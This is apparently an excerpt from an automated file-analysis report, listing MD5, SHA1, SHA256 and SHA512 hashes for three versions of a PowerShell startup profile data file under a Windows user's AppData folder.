MD5 e8a7ab7bae6a69946da69507ee7ae7b0
SHA1 b367c72fa4948493819e1c32c32239aa6e78c252
SHA256 cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
SHA512 89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d942468d4637c824a302febded698672
SHA1 45fa78a0a13b14ab2e59ee16329f2b9f592a7900
SHA256 7aeebfc965cde306ad61dfe2cf7d243398ffdcfc8027640b434d121a0a2994ae
SHA512 92b675b45a16eed5eda7b6f056c27577498fadb49df8a0c4ae64bd79babe9d7747246a8df3785a1efb84f7c654daafe0e8f377242cc7a202801f574c616cc2b7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e2c8b4b6d6ff76c4b7d5da3fe65b1578
SHA1 ec5bbbcf4d7f439bb37155ae3b3216b3c98ae78c
SHA256 1f1fe0ebe8501580fef3091ad10c55b861ddc89fda88056f0df7a4958964c572
SHA512 38f9f90f8df1e88fd05bf91fda586491cc0ef757163cf9ad60f43f4d39ca1eec34919c6a866616f9dddad5eab0b7de54d1732e83d32fdb2bd843e6577cecb51c